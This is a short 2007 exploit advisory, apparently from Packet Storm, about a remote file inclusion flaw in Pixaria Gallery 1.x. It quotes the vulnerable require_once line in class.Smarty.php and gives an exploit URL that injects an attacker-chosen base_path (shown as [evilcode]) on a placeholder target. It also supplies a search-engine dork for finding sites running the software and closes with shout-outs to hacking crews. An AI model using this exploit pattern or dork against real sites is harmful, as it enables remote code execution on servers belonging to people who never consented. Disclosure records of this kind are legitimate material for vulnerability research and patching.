pizaria-rfi.txt

2007-04-17T00:00:00
ID PACKETSTORM:55965
Type packetstorm
Reporter irvian
Modified 2007-04-17T00:00:00

Description

                                        
                                            `Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability  
  
-----------------------------------------------------------------------------------------  
# scripts : Pixaria Gallery 1.x  
# Discovered By : irvian  
# scripts site : http://pixaria.com/  
# Thanks To : #hitamputih #nyubicrew #patihack  
# special To : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz  
# dork : powered by Pixaria. Gallery  
------------------------------------------------------------------------------------------  
bug found:  
  
/resources/includes/class.Smarty.php  
// Load the main Smarty class  
require_once ($cfg['sys']['base_path'] . "resources/smarty/libs/Smarty.class.php");  
  
  
Exploit: http://www.target.com/resources/includes/class.Smarty.php?cfg[sys][base_path]=[evilcode]   
  
`